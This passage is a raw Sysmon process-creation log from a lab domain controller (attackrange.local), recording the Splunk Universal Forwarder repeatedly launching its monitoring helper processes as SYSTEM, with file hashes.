14:25:17.744{A8622C2F-4CCD-6078-A906-00000000AE01}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034539Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:25:17.111{A8622C2F-4CCD-6078-A806-00000000AE01}5716C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034463Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:24:22.806{A8622C2F-4C96-6078-A706-00000000AE01}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034448Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:24:21.735{A8622C2F-4C95-6078-A606-00000000AE01}6400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034438Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:24:21.069{A8622C2F-4C95-6078-A506-00000000AE01}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034429Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:24:20.397{A8622C2F-4C94-6078-A406-00000000AE01}4232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034418Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:24:18.396{A8622C2F-4C92-6078-A306-00000000AE01}6600C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034407Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:24:17.729{A8622C2F-4C91-6078-A206-00000000AE01}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034398Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:24:17.124{A8622C2F-4C91-6078-A106-00000000AE01}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034266Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:23:22.805{A8622C2F-4C5A-6078-A006-00000000AE01}6220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000034251Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:23:21.747{A8622C2F-4C59-6078-9F06-00000000AE01}3420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034239Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:23:21.084{A8622C2F-4C59-6078-9E06-00000000AE01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034229Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:23:20.402{A8622C2F-4C58-6078-9D06-00000000AE01}4232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034208Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:23:18.396{A8622C2F-4C56-6078-9C06-00000000AE01}2196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034199Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:23:17.730{A8622C2F-4C55-6078-9B06-00000000AE01}5800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000034189Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:23:17.110{A8622C2F-4C55-6078-9A06-00000000AE01}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034102Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:22:22.784{A8622C2F-4C1E-6078-9906-00000000AE01}3736C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000034088Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:22:21.730{A8622C2F-4C1D-6078-9806-00000000AE01}6696C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
14:15:18.376{A8622C2F-4A76-6078-6306-00000000AE01}3320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032848Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:15:17.681{A8622C2F-4A75-6078-6206-00000000AE01}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032839Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:15:17.100{A8622C2F-4A75-6078-6106-00000000AE01}5976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032752Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:14:23.235{A8622C2F-4A3F-6078-6006-00000000AE01}6080C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032740Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:14:21.727{A8622C2F-4A3D-6078-5F06-00000000AE01}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032725Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:14:21.112{A8622C2F-4A3D-6078-5E06-00000000AE01}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032714Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:14:20.336{A8622C2F-4A3C-6078-5D06-00000000AE01}4568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032704Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:14:18.314{A8622C2F-4A3A-6078-5C06-00000000AE01}6540C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032695Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:14:17.656{A8622C2F-4A39-6078-5B06-00000000AE01}3496C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032685Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:14:17.097{A8622C2F-4A39-6078-5A06-00000000AE01}6336C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000032567Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:13:23.231{A8622C2F-4A03-6078-5906-00000000AE01}6336C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032547Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:13:21.655{A8622C2F-4A01-6078-5806-00000000AE01}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032536Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:13:21.103{A8622C2F-4A01-6078-5706-00000000AE01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032526Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:13:20.337{A8622C2F-4A00-6078-5606-00000000AE01}2664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032506Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:13:18.435{A8622C2F-49FE-6078-5506-00000000AE01}5392C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032496Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
